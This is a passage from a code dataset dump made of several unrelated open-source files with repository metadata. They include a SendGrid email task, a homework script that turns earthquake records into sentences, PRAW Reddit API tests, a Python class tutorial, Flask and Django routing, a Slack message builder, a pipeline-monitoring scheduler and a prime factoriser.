},\n {\n \"src\": third_subline.line.player.headshot_url,\n \"name\": str(third_subline.line.player),\n \"game\": str(third_subline.line.game),\n \"projection\": f\"{str(round(third_subline.projected_value, 1))} {third_subline.line.category.category}\",\n },\n ]\n\n for user_id in users_with_slips_yesterday:\n u = User.objects.get(id=user_id)\n\n slips = users_with_slips_yesterday[user_id]\n slips_sg = []\n\n for slip in slips:\n slips_sg.append(\n {\n \"numPicks\": slip.pick_set.count(),\n \"payoutAmount\": f\"${slip.payout_amount}\",\n \"outcome\": \"Won\" if slip.won else \"Lost\",\n }\n )\n\n message = Mail(\n from_email=\"support@underlinesports.com\",\n to_emails=\"arithmetic@gmail.com\" if settings.DEBUG else slip.owner.email,\n 
)\n\n ftp = \" Free to Play \" if u.free_to_play else \" \"\n yesterday_str = dateformat.format(yesterday, \"F jS\")\n today_str = dateformat.format(today, \"F jS\")\n subject = f\"Underline{ftp}Results for {yesterday_str}\"\n body = f\"Hey {u.first_name} - here are your{ftp}results for {yesterday_str}.\"\n\n # pass custom values for our HTML placeholders\n payload = {\n \"subject\": subject,\n \"body\": body,\n \"todayDate\": today_str,\n \"slips\": slips_sg,\n \"todayLines\": today_lines,\n }\n\n message.dynamic_template_data = payload\n message.template_id = \"d-83f3ae1c712a4e45af4744e2818489a8\"\n\n sg = SendGridAPIClient(settings.SENDGRID_API_KEY)\n if not settings.DEBUG:\n response = sg.send(message)\n code, body, headers = (\n response.status_code,\n response.body,\n response.headers,\n )\n","repo_name":"dopeboy/underline","sub_path":"server/core/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":7432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33893355724","text":"import time\nimport dateutil.parser\nimport pandas as pd\n\nearthquake = {\n\t'rms': '1.85',\n\t'updated': '2014-06-11T05:22:21.596Z',\n\t'type': 'earthquake',\n\t'magType': 'mwp',\n\t'longitude': '-136.6561',\n\t'gap': '48',\n\t'depth': '10',\n\t'dmin': '0.811',\n\t'mag': '5.7',\n\t'time': '2014-06-04T11:58:58.200Z',\n\t'latitude': '59.0001',\n\t'place': '73km WSW of Haines, Alaska',\n\t'net': 'us',\n\t'nst': '',\n\t'id': 'usc000rauc'}\n\n\ndef eq_to_sentence(quake):\n\tprint(\"A\", \\\n\t\tdepth_to_words(quake['depth']), \\\n\t\tmag_to_words(quake['mag']), \\\n\t\t\"earthquake was reported\", \\\n\t\tday_in_words(quake['time']), \\\n\t\t\"on\", \\\n\t\tdate_in_words(quake['time']), \\\n\t\t\"in the\", \\\n\t\ttime_in_words(quake['time']), \\\n\t\tearthquake['place'] \\\n\t\t+ \".\")\n\ndef ex_to_sentence(explosion):\n\tprint(\"There was also a magnitude\", explosion['mag'], explosion['type'], \"on\", date_in_words(explosion['time']), explosion['place'] + \".\")\n\n\ndef depth_to_words(depth):\n\tif int(depth) > 300:\n\t\treturn \"deep\"\n\tif int(depth) > 70:\n\t\treturn \"intermediate\"\n\tif int(depth) < 70:\n\t\treturn \"shallow\"\n\telse:\n\t\treturn \" \"\n\ndef mag_to_words(mag):\n\tif float(mag) > 8 :\n\t\treturn \"ground breaking strong\"\n\telif float(mag) > 7:\n\t\treturn \"great\"\n\telif float(mag) > 6: \n\t\treturn \"strong\"\n\telif float(mag) > 5:\n\t\treturn \"moderate\"\n\telif float(mag) > 4: \n\t\treturn \"light\"\n\telse:\n\t\treturn \"minor\"\n\ndef day_in_words(timestring): \n\tyourdate = dateutil.parser.parse(timestring)\n\treturn yourdate.strftime(\"%A\")\n\ndef date_in_words(timestring):\n\tyourdate = dateutil.parser.parse(timestring)\n\treturn yourdate.strftime(\"%B %d\")\n\ndef time_in_words(datestring):\n\tyourdate = dateutil.parser.parse(datestring)\n\tweekday = yourdate.strftime(\"%A\")\n\ttime = yourdate.strftime(\"%H:%M\")\n\tif time < '06:00' :\n\t\treturn \"night\"\n\tif time < '12:00': \n\t\treturn \"morning\"\n\tif time < '18:00':\n\t\treturn \"afternoon\"\n\tif time < '24:00': \n\t\treturn \"evening\" \n\telse: \n\t\treturn \"invalid time\"\n\n\nearthquakes_df = pd.read_csv(\"http://earthquake.usgs.gov/earthquakes/feed/v1.0/summary/1.0_month.csv\")\nearthquakes = earthquakes_df.to_dict('records')\n\nfor earthquake in earthquakes: \n\tif earthquake['type'] != 'earthquake':\n\t\tex_to_sentence(earthquake)\n\tif earthquake['mag'] > 
4:\n\t\teq_to_sentence(earthquake)\n","repo_name":"thisss/lede12-homework","sub_path":"foundations/09/homework_9.py","file_name":"homework_9.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70358150889","text":"\"\"\"Test praw.reddit.\"\"\"\nfrom base64 import urlsafe_b64encode\n\nimport pytest\nfrom prawcore.exceptions import BadRequest\n\nfrom praw.exceptions import RedditAPIException\nfrom praw.models import LiveThread\nfrom praw.models.reddit.base import RedditBase\nfrom praw.models.reddit.submission import Submission\nfrom praw.models.reddit.subreddit import Subreddit\n\nfrom . import IntegrationTest\n\n\ndef comment_ids():\n with open(\"tests/integration/files/comment_ids.txt\") as fp:\n return fp.read()[:8000]\n\n\ndef junk_data():\n with open(\"tests/integration/files/too_large.jpg\", \"rb\") as fp:\n return urlsafe_b64encode(fp.read()).decode()\n\n\nclass TestDomainListing(IntegrationTest):\n def test_controversial(self, reddit):\n submissions = list(reddit.domain(\"youtube.com\").controversial())\n assert len(submissions) == 100\n\n def test_hot(self, reddit):\n submissions = list(reddit.domain(\"youtube.com\").hot())\n assert len(submissions) == 100\n\n def test_new(self, reddit):\n submissions = list(reddit.domain(\"youtube.com\").new())\n assert len(submissions) == 100\n\n def test_random_rising(self, reddit):\n submissions = list(reddit.domain(\"youtube.com\").random_rising())\n assert len(submissions) == 100\n\n def test_rising(self, reddit):\n list(reddit.domain(\"youtube.com\").rising())\n\n def test_top(self, reddit):\n submissions = list(reddit.domain(\"youtube.com\").top())\n assert len(submissions) == 100\n\n\nclass TestReddit(IntegrationTest):\n @pytest.mark.add_placeholder(comment_ids=comment_ids())\n def test_bad_request_without_json_text_html_response(self, reddit):\n with pytest.raises(RedditAPIException) as excinfo:\n reddit.request(\n method=\"GET\",\n path=f\"/api/morechildren?link_id=t3_n7r3uz&children={comment_ids()}\",\n )\n assert (\n str(excinfo.value)\n == \"
<html><body><h1>400 Bad request</h1>
\\nYour browser sent an invalid \"\n \"request.\\n\\n\"\n )\n\n @pytest.mark.add_placeholder(content=junk_data())\n def test_bad_request_without_json_text_plain_response(self, reddit):\n with pytest.raises(RedditAPIException) as excinfo:\n reddit.request(\n method=\"GET\",\n path=f\"/api/morechildren?link_id=t3_n7r3uz&children={junk_data()}\",\n )\n assert str(excinfo.value) == \"Bad Request\"\n\n def test_bare_badrequest(self, reddit):\n data = {\n \"sr\": \"AskReddit\",\n \"field\": \"link\",\n \"kind\": \"link\",\n \"title\": \"l\",\n \"text\": \"lol\",\n \"show_error_list\": True,\n }\n reddit.read_only = False\n with pytest.raises(BadRequest):\n reddit.post(\"/api/validate_submission_field\", data=data)\n\n def test_info(self, reddit):\n bases = [\"t1_d7ltv\", \"t3_5dec\", \"t5_2qk\"]\n items = []\n for i in range(100):\n for base in bases:\n items.append(f\"{base}{i:02d}\")\n\n item_generator = reddit.info(fullnames=items)\n results = list(item_generator)\n assert len(results) > 100\n for item in results:\n assert isinstance(item, RedditBase)\n\n def test_info_sr_names(self, reddit):\n items = [reddit.subreddit(\"redditdev\"), \"reddit.com\", \"t:1337\", \"nl\"]\n item_generator = reddit.info(subreddits=items)\n results = list(item_generator)\n assert len(results) == 4\n for item in results:\n assert isinstance(item, Subreddit)\n\n def test_info_url(self, reddit):\n results = list(reddit.info(url=\"youtube.com\"))\n assert len(results) > 0\n for item in results:\n assert isinstance(item, Submission)\n\n def test_live_call(self, reddit):\n thread_id = \"ukaeu1ik4sw5\"\n thread = reddit.live(thread_id)\n assert thread.title == \"reddit updates\"\n\n def test_live_create(self, reddit):\n reddit.read_only = False\n live = reddit.live.create(\"PRAW Create Test\")\n assert isinstance(live, LiveThread)\n assert live.title == \"PRAW Create Test\"\n\n def test_live_info(self, reddit):\n ids = \"\"\"\n ta40aifzobnv ta40l9u2ermf ta40ucdiq366 ta416hjgvbhy ta41ln5vsyaz\n ta42cyzy1nze ta42i49806k0 ta436ojd653m ta43945wgmaa ta43znjvza9t\n ta4418kxie3z ta44mk0nllhm ta45j0yvww9t ta4613lzdh8q ta46l8k86jt9\n ta47qua0xu3n ta489fm9515p ta48ml5k1uk9 ta48zy4jzjcb ta49irvwndau\n ta49upckgoyw ta4a02h9ynsb ta4aa4lrgvst ta4alauoi8ws ta4aqyacr70u\n\n ta4ekdk6m5g2 ta4ezvoc49gy ta4f3iv06c1n ta4ffvliq5l7 ta4fib9lx3zx\n ta4gka0ll41h ta4h89f6isfg ta4ht7s8he49 ta4i1eb564ar ta4imxhap4fg\n ta4iu3g9whtk ta4j3o05j0d3 ta4kloqi6csg ta4m6kj44dql ta4mlqtihiil\n ta4ng30l3fz1 ta4nldsjimhu ta4pd78tuk29 ta4prwyy1w9i ta4pvu8y6f8o\n ta4ray2odqub ta4rua4oe6a1 ta4tk9fwjgz1 ta4trgqw6mmx ta4tv3sen7u4\n\n ta4uyh0fnc0a ta4v54gnggcl ta4v5cm004z1 ta4vortaefna ta4wqym9d0v3\n ta4wsuouxjtm ta4x7jr9v0fn ta4yast5e96b ta4z337yzlgu ta4zo9zzo9ui\n ta507u2euo3w ta50exn0mtx1 ta51x2crezff ta52ch48gn6l ta53ijowvc6z\n ta53iy196uod ta541cz1hfb4 ta54n0ncx8pc ta55ytfmre2g ta581bybyjwi\n ta59gcidn2ym ta59mkwnrd43 ta5ar22wzi2w ta5awwo42ibb ta5dhmvylw0l\n\n ta5hipd6wahr ta5itb7clg3s ta5nlm09y8kb ta5nm0f831x1 ta5oavbflorf\n ta5rnv18s85o ta5ru6ysh254 ta5sfz02nc8b ta5syawj086b ta5t41osygln\n ta5uy3ynoo4a ta5w0seb1xfy ta5wddbh0ln0 ta5zmjzuijwo ta617ozbmxhb\n ta64q6pjz2bs ta696fdie4ne ta6bmog7gvoq ta6f9y7sdzru ta6j838d2wjn\n ta6l4q5c17fd ta6ofypk3yp2 ta6sjmjt1aeb ta6sqhgyv41q ta70eezhz50r\n\n ta72azs1l4u9 ta74r3dp2pt5 ta7pfcqdx9cl ta8zxbt2sk6z ta94nde51q4i\n \"\"\".split()\n gen = reddit.live.info(ids)\n threads = list(gen)\n assert len(threads) > 100\n assert all(isinstance(thread, LiveThread) for thread in threads)\n # output may not reflect input order\n 
thread_ids = [thread.id for thread in threads]\n assert thread_ids != ids\n assert sorted(thread_ids) == ids\n\n def test_live_info__contain_invalid_id(self, reddit):\n ids = [\n \"3rgnbke2rai6hen7ciytwcxadi\",\n \"LiveUpdateEvent_sw7bubeycai6hey4ciytwamw3a\", # invalid\n \"t8jnufucss07\",\n ] # NBA\n gen = reddit.live.info(ids)\n threads = list(gen)\n assert len(threads) == 2\n\n def test_live_now__featured(self, reddit):\n thread = reddit.live.now()\n assert isinstance(thread, LiveThread)\n assert thread.id == \"z2f981agq7ky\"\n\n def test_live_now__no_featured(self, reddit):\n assert reddit.live.now() is None\n\n def test_notes__call__(self, reddit):\n reddit.read_only = False\n notes = list(\n reddit.notes(\n pairs=[\n (reddit.subreddit(\"SubTestBot1\"), \"Watchful1\"),\n (\"SubTestBot1\", reddit.redditor(\"watchful12\")),\n (\"SubTestBot1\", \"spez\"),\n ],\n things=[reddit.submission(\"jlbw48\")],\n )\n )\n assert len(notes) == 4\n assert notes[0].user.name.lower() == \"watchful1\"\n assert notes[1].user.name.lower() == \"watchful12\"\n assert notes[2] is None\n\n def test_notes__things(self, reddit):\n reddit.read_only = False\n thing = reddit.submission(\"tpbemz\")\n notes = list(reddit.notes.things(thing))\n assert len(notes) == 10\n assert notes[0].user == thing.author\n\n def test_random_subreddit(self, reddit):\n names = set()\n for i in range(3):\n names.add(reddit.random_subreddit().display_name)\n assert len(names) == 3\n\n def test_subreddit_with_randnsfw(self, reddit):\n subreddit = reddit.subreddit(\"randnsfw\")\n assert subreddit.display_name != \"randnsfw\"\n assert subreddit.over18\n\n def test_subreddit_with_random(self, reddit):\n assert reddit.subreddit(\"random\").display_name != \"random\"\n\n @pytest.mark.add_placeholder(AVAILABLE_NAME=\"prawtestuserabcd1234\")\n def test_username_available__available(self, reddit):\n assert reddit.username_available(\"prawtestuserabcd1234\")\n\n def test_username_available__unavailable(self, reddit):\n assert not reddit.username_available(\"bboe\")\n\n def test_username_available_exception(self, reddit):\n with pytest.raises(RedditAPIException) as exc:\n reddit.username_available(\"a\")\n assert str(exc.value) == \"BAD_USERNAME: 'invalid user name' on field 'user'\"\n","repo_name":"praw-dev/praw","sub_path":"tests/integration/test_reddit.py","file_name":"test_reddit.py","file_ext":"py","file_size_in_byte":8610,"program_lang":"python","lang":"en","doc_type":"code","stars":3211,"dataset":"github-code","pt":"53"} +{"seq_id":"30167582047","text":"# Object oriented programming\n\n# Breaks programming into objects that interact with each other\n# Objetcs are created from templates known as classes\n# an object is the actual building that we build based on the blueprint\n\n# to Understand how OOP works\n# we can write our own class\n\n# we write class followed by the name of the class\n# syntax\n\n# class name_of_class\n# Example\n# This class can be used to store al the relevant information about a staff in the company\n\nclass staff:\n def __init__(self, p_position, p_name, p_pay):\n self.position = p_position\n self.name = p_name\n self.pay = p_pay\n print(\"Creating Staff object\")\n\n def __str__(self):\n return \"Position = %s, Name = %s, Pay = %d\" %(self.position, self.name, self.pay)\n \n def calculate_pay(self):\n prompt = '\\nEnter number of hours worked for %s: ' %(self.name)\n hours = input(prompt)\n prompt = 'Enter hourly rate for %s: ' %(self.name)\n hourly_rate = input(prompt)\n self.pay = int(hours)*int(hourly_rate)\n 
return self.pay\n\n# Instantiating an object\n\noffice_staff1 = staff('Basic', 'Yvonne', 0)\n\n# to access the variable name\nprint(office_staff1.name)\n\n# to accesss the variable position\nprint(office_staff1.position)\n\n# to change variable position and print it again\n# change variable position\noffice_staff1.position = 'Manager'\nprint(office_staff1.position)\n\n# to access the variable pay\nprint(office_staff1.pay)\n\n\n# METHODS\n# to use calculatepay() method\noffice_staff1.calculate_pay()\nprint(office_staff1.pay)\n\n\n# to Print a representation of Office_staff1\nprint(office_staff1)\n# you get\n# Position = Manager, Name = Yvonne, Pay = 600","repo_name":"Antoniorios17/python_mini_projects","sub_path":"python_object_oriented_programming/python01_Writing_own_class.py","file_name":"python01_Writing_own_class.py","file_ext":"py","file_size_in_byte":1687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9642048145","text":"from flask import render_template, request\nfrom app import app\nfrom models.event import *\nfrom models.event_list import events\n\n@app.route(\"/events\")\ndef index():\n return render_template(\"index.html\", title=\"home\", events = events)\n\n@app.route(\"/events\", methods = [\"POST\"])\ndef add_event():\n event_title = request.form[\"title\"]\n event_description = request.form[\"description\"] \n event_date = request.form[\"date\"]\n event_location = request.form[\"location\"]\n event_capacity = request.form[\"capacity\"]\n new_event = Event(event_date, event_title, event_capacity, event_location, event_description)\n new_event.add_new_event(events, new_event)\n return render_template(\"index.html\", title=\"home\", events = events)\n\n\n@app.route(\"/events/new\")\ndef new_event():\n return render_template(\"new.html\", title=\"new event\")\n\n\n","repo_name":"br1Pod/wk3_d4_event_lab","sub_path":"controllers/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4893127459","text":"from bot.messages import get_task_actions\nfrom bot.messages.message import Message\n\n\ndef get_task_messages(release_title=None, task=None, task_type=None, all_user_config_meta=None, base_url=None):\n if task[\"status\"] in [\"COMPLETED\", \"SKIPPED\", \"ABORTED\"]:\n actions = []\n attachment_text = \"`{}`\".format(task[\"status\"])\n else:\n actions = get_task_actions(task)\n attachment_text = \"`{}`. 
Take action!\".format(task[\"status\"])\n if \"owner\" in task:\n attachment_text = \"`{}` {}, take action!\".format(task[\"status\"], task[\"owner\"])\n for config in all_user_config_meta:\n if config[\"username\"] == task[\"owner\"]:\n attachment_text = \"`{}` <@{}>, take action!\".format(task[\"status\"],\n config[\"slack_user_id\"])\n break\n\n if \"description\" in task:\n append_desc = \"\\n*Description*\\n{}\\n\".format(task[\"description\"])\n attachment_text += append_desc\n\n if \"comments\" in task and task[\"comments\"]:\n append_comments = \"\\n*Comments ({})*\\n\".format(len(task[\"comments\"]))\n for comment in task[\"comments\"]:\n append_comments = \"{}*Added by : {}*\\n{}\\n\\n\".format(append_comments,\n comment[\"author\"] if \"author\" in comment else \"\",\n comment[\"text\"])\n attachment_text += append_comments\n\n temp_task_id = task[\"id\"][task[\"id\"].find('Phase'):].replace(\"/\", \"-\")\n temp_release_id = task[\"id\"][:task[\"id\"].find('/Phase')]\\\n .replace(\"Applications/\", \"\")\\\n .replace(\"/\", \"-\")\n url = \"{}?openTaskDetailsModal={}\".format(temp_release_id, temp_task_id)\n release_url = \"{}/#/releases/{}\".format(base_url, temp_release_id)\n\n author = {\n \"author_name\": task_type,\n \"author_icon\": \"https://cdn0.iconfinder.com/data/icons/planing-and-organization/100/12-512.png\"\n }\n footer = {\n \"footer\": \"<{}|{}>\".format(release_url, release_title),\n \"footer_icon\": \"https://cdn2.iconfinder.com/data/icons/scrum-project/100/Release2-512.png\"\n }\n message = Message.get_base_message(author=author, footer=footer)\n message[\"attachments\"][0][\"title\"] = task[\"title\"]\n message[\"attachments\"][0][\"title_link\"] = \"{}/#/releases/{}\".format(base_url, url)\n message[\"attachments\"][0][\"color\"] = Message.get_task_message_color(task[\"status\"])\n message[\"attachments\"][0][\"text\"] = attachment_text\n message[\"attachments\"][0][\"callback_id\"] = \"task-action\"\n message[\"attachments\"][0][\"actions\"] = actions\n return message\n","repo_name":"xebialabs-community/slack-xlrelease-app","sub_path":"bot/messages/task_messages.py","file_name":"task_messages.py","file_ext":"py","file_size_in_byte":2708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23079846196","text":"#coding:utf-8\n\nfrom apscheduler.schedulers.blocking import BlockingScheduler\nimport pymysql\nimport datetime\nimport traceback\nimport pymongo\n\nfrom city.config import data_config, OpCity_config, base_path, config as temp_config\nfrom call_city_project.step_status import modify_status, getStepStatus\nfrom my_logger import get_logger\nfrom call_city_project.report import make_poi_and_hotel_report, make_image_content_report, get_file\nfrom call_city_project.step_status import modify_status\ntry:\n from call_city_project.city_step_seven import check_POI_data, update_mapinfo, analysis_result, success_report, dumps_sql, send_email_format\nexcept:pass\nfrom city.find_hotel_opi_city import from_ota_get_city\n\nscheduler = BlockingScheduler()\nlogger = get_logger('monitor', base_path)\n\n\ndef update_step_report(csv_path,param,step_front,step_after,step_num):\n conn = pymysql.connect(**OpCity_config)\n cursor = conn.cursor()\n update_sql_front = \"update city_order set report\"+str(step_num)+\"=%s,step\"+str(step_num)+\"=%s where id=%s\"\n update_sql_after = \"update city_order set step\"+str(step_num+1)+\"=%s where id=%s\"\n try:\n cursor.execute(update_sql_front,(csv_path,step_front,param))\n 
cursor.execute(update_sql_after,(step_after,param))\n conn.commit()\n except Exception as e:\n conn.rollback()\n finally:\n conn.close()\n\ndef from_tag_get_tasks_status(name, flag=False):\n conn = pymysql.connect(**data_config)\n cursor = conn.cursor()\n sql_step_report = \"select * from service_platform_product_mongo_report where tag=%s\"\n sql_step_summary = \"select * from serviceplatform_product_mongo_split_task_summary where task_name=%s\"\n sql = sql_step_report if flag else sql_step_summary\n try:\n cursor.execute(sql, (name,))\n result = cursor.fetchall()\n finally:\n conn.close()\n return result\n\ndef step7_detection(tag):\n try:\n update_mapinfo(tag)\n qyer_report_result, _1, daodao_report_result, _2 = check_POI_data(tag)\n print(qyer_report_result)\n print(daodao_report_result)\n logger.info('[{0}] qyer {1}'.format(tag, qyer_report_result))\n logger.info('[{0}] daodao {1}'.format(tag, daodao_report_result))\n qyer_flag, qyer_report = analysis_result(qyer_report_result, 'qyer')\n daodao_flag, daodao_report = analysis_result(daodao_report_result, 'daodao')\n\n report = success_report(tag)\n check_report = '数据检测结果:\\n' + qyer_report + '\\n' + daodao_report + '\\n\\n' + report\n rsync_paths = []\n if qyer_flag and daodao_flag:\n for source in ['total', 'attr']:\n rsync_path = dumps_sql(tag, source)\n send_email_format(check_report, rsync_path)\n else:\n for source in ['total', 'attr']:\n rsync_paths.append(dumps_sql(tag, source))\n send_email_format(check_report, rsync_paths)\n except Exception as e:\n logger.error('================= ' + tag + ' ================= {}'.format(traceback.format_exc()))\n\n\ndef monitor_task_summary(step):\n stepa = 'step'+step\n logger.info('================= ' + stepa + ' ================= 开始')\n csvpath = ''\n tasks = getStepStatus(stepa)\n for param, values in tasks.items():\n if len(values) == 0: return\n if type(values[0]) is list:\n task_naems = list(zip(*values))[1]\n else:\n task_naems = [values[1]]\n the_progress_of = 0\n for task_name in task_naems:\n logger.info('{}, {}'.format(stepa, task_name))\n tasks_status = from_tag_get_tasks_status(task_name)\n logger.info('{}, {}'.format(stepa, tasks_status))\n line = tasks_status[0]\n t_all, t_done, t_failed = line[3], line[4], line[5]\n if t_all == t_done + t_failed:\n the_progress_of += 1\n\n if the_progress_of==len(task_naems):\n if step=='7':\n tag = task_name.rsplit('_')[-1]\n step7_detection(tag)\n # if not get_file(param, 'poireport.csv'):\n elif step=='8':\n if not make_image_content_report(t_all, t_done, t_failed, param):return\n csvpath = '{}/merge_image_and_content.txt'.format(param)\n if step in ('4', '9'):\n update_step_report(csvpath, param, 4, 0, int(step))\n elif step not in ('6', '7'):\n update_step_report(csvpath, param, 1, 0, int(step))\n modify_status(stepa, param, flag=False)\n logger.info('================= ' + stepa + ' ================= 完成')\n logger.info('================= ' + stepa + ' ================= 1')\n\ndef monitor_report(step):\n stepa = 'step' + step\n logger.info('================= ' + stepa + ' ================= 开始')\n tasks = getStepStatus(stepa)\n for param, values in tasks.items():\n if len(values)==0:continue\n task_names = zip(*values).__next__()\n logger.info('{}, {}'.format(stepa, task_names))\n tag = str(task_names[0].rsplit('_', 1)[-1])\n logger.info('{}, {}'.format(stepa, tag))\n tasks_status = from_tag_get_tasks_status(tag, True)\n finaled_date = max(a[-1] for a in tasks_status)\n all_finaled_data = [a for a in tasks_status if a[-1]==finaled_date]\n 
logger.info('{}, {}'.format(stepa, tasks_status))\n if len(tasks_status) < len(task_names):\n logger.info('{}, {}'.format(stepa, '任务状态数 小于 任务已发任务数'))\n continue\n status_list_len = 0\n for (_0, source, _2, l_done, l_failed, _5, l_all, d_done, d_failed, d_all, i_done, i_failed, i_all, _13) in all_finaled_data:\n #规则 1 完成任务数 + 失败任务数 = 任务总数\n #规则 2 失败任务数 == 任务总数 发邮件报警\n if not (l_done+l_failed==l_all and d_done+d_failed==d_all and i_done+i_failed==i_all) or l_failed==l_all or d_failed==d_all:\n if source in ('Qyer', 'Daodao'):continue\n logger.info('{}, {}: {}'.format(stepa, '未完成', source))\n break\n else:\n logger.info('{}, {}: {}'.format(stepa, '已完成', source))\n status_list_len+=1\n if status_list_len>=len(task_names):\n modify_status(stepa, param, flag=False)\n logger.info('{}, 开始生成报表'.format(stepa))\n csv_file = make_poi_and_hotel_report(all_finaled_data, param)\n update_step_report(csv_file, param, 1, 0, int(step))\n logger.info('================= ' + stepa + ' ================= 完成')\n\n logger.info('================= ' + stepa + ' ================= 1')\n\ndef get_total_count(collection_name):\n client = pymongo.MongoClient(host='10.10.231.105')\n collection = client['MongoTask'][collection_name]\n total_count = collection.find({}).count()\n return total_count\n\n\ndef monitor_step3(stepa):\n step = 'step'+stepa\n tasks = getStepStatus(step)\n temp_config['db'] = 'Cityupline'\n if len(tasks) == 0:return\n for param, collection_names in tasks.items():\n collection_name, task_name = collection_names\n total_count = get_total_count(collection_name)\n if int(total_count) == 0:\n return '0%'\n\n client = pymongo.MongoClient(host='10.10.231.105')\n collection = client['MongoTask'][collection_name]\n\n success_results = collection.find({\n 'finished': 1,\n 'used_times': {'$lt': 7},\n 'task_name': task_name\n }, hint=[('task_name', 1), ('finished', 1), ('used_times', 1)])\n success_finish_num = success_results.count()\n\n failed_results = collection.find({\n 'finished': 0,\n 'used_times': 7,\n 'task_name': task_name\n }, hint=[('task_name', 1), ('finished', 1), ('used_times', 1)])\n failed_finish_num = failed_results.count()\n\n logger.info('{0}, collections: {1} total: {2} success: {3} failed: {4}'.format(step, collection_name, total_count, success_finish_num, failed_finish_num))\n if failed_finish_num>0 and failed_finish_num+success_finish_num==total_count:\n logger.info('{0}, {1} 失败'.format(step, collection_name))\n\n if success_finish_num == total_count:\n from_ota_get_city(temp_config, param)\n modify_status(step, param, flag=False)\n logger.info('{0}, {1} 成功'.format(step, collection_name))\n\n return format(success_finish_num/total_count, '.0%')\n\n\ndef local_jobs():\n # scheduler.add_job(monitor_report, 'date', args=('5',), next_run_time=datetime.datetime.now() + datetime.timedelta(seconds=2), id='test')\n # scheduler.add_job(monitor_step3,'cron',args=('3',),second='*/300',id='step3')\n scheduler.add_job(monitor_task_summary, 'cron', args=('4',), second='*/300', next_run_time=datetime.datetime.now() + datetime.timedelta(seconds=83), id='step4')\n scheduler.add_job(monitor_task_summary, 'cron', args=('9',), second='*/300', next_run_time=datetime.datetime.now() + datetime.timedelta(seconds=23), id='step9')\n scheduler.add_job(monitor_report, 'cron', args=('5',), second='*/300', id='step5')\n scheduler.add_job(monitor_task_summary, 'cron', args=('8',), second='*/300', id='step8')\n scheduler.add_job(monitor_task_summary, 'cron', args=('7',), second='*/300', id='step7')\n\n\nif __name__ == 
'__main__':\n local_jobs()\n scheduler.start()\n # monitor_step3('3')","repo_name":"20113261/p_m","sub_path":"call_city_project/monitor_status.py","file_name":"monitor_status.py","file_ext":"py","file_size_in_byte":9572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74580560809","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 20 20:52:15 2020\n\n@author: redne\n\"\"\"\n\nnumbers = {0: False,\n 1: False,\n 2: True}\n\nprimes = [2]\n\nnum = 3\n\ncheck_until = 5000\n\ndef checkPrime(n):\n for factor in primes:\n if (n % factor == 0):\n return False\n \n primes.append(n)\n return True\n\nwhile (num <= check_until):\n numbers[num] = checkPrime(num)\n num += 1\n \ndef getFactorization(n):\n if (n in primes):\n return {n : 1}\n factors = {}\n remaining = n\n while (remaining not in primes):\n factorFound = False\n for factor in primes:\n if (remaining % factor == 0):\n factors[factor] = factors.get(factor, 0) + 1\n remaining = int(remaining / factor)\n factorFound = True\n break\n if (not factorFound):\n raise ValueError('remaining value ({}) neither prime nor factorable in current list'.format(remaining))\n factors[remaining] = factors.get(remaining, 0) + 1\n \n return factors\n\ndef recursivelyFactor(n, *, lowerLimit = 2):\n print('now factoring: {}'.format(n))\n factors = {}\n factor = lowerLimit\n upperLimit = int(n/2)\n \n factorFound = False\n while (factor <= upperLimit):\n if (n % factor == 0):\n factors[factor] = factors.get(factor, 0) + 1\n remaining = int(n / factor)\n print(' {0} factors into {1} and {2}'.format(n, factor, remaining))\n \n subFactors = recursivelyFactor(remaining, lowerLimit = factor)\n \n for key in subFactors.keys():\n factors[key] = factors.get(key, 0) + subFactors[key]\n \n factorFound = True\n break \n factor += 1\n \n if (not factorFound):\n factors[n] = factors.get(n, 0) + 1\n #factors[remaining] = factors.get(remaining, 0) + 1 \n \n return factors\n\nprint(recursivelyFactor(12345678987654321))","repo_name":"eqkessel/PythonSandbox","sub_path":"Misc/primeFinder.py","file_name":"primeFinder.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"30445534365","text":"from django.conf.urls import patterns, include, url\n\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n url(r'^admin/', include(admin.site.urls)),\n url(r'^redactor/', include('redactor.urls')),\n #(r'^pages/', include('django.contrib.flatpages.urls')),\n \n url(r'^$', 'products.views.index', name='home'),\n url(r'^contact/?$', 'products.views.contact'),\n url(r'^(?P[\\w_-]+)$', 'products.views.details'),\n url(r'^q/(?P(type)?)/?(?P[\\w -]{0,100})$', 'products.views.search'),\n)\n\ntry:\n urlpatterns += patterns('', (r'^flexselect/', include('flexselect.urls')), )\nexcept ImportError:\n urlpatterns += patterns('flexselect.views', (r'field_changed', 'field_changed'), )\n\nif settings.LOCAL:\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)","repo_name":"fabiopiovam/motosucata-django","sub_path":"motosucata/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} 
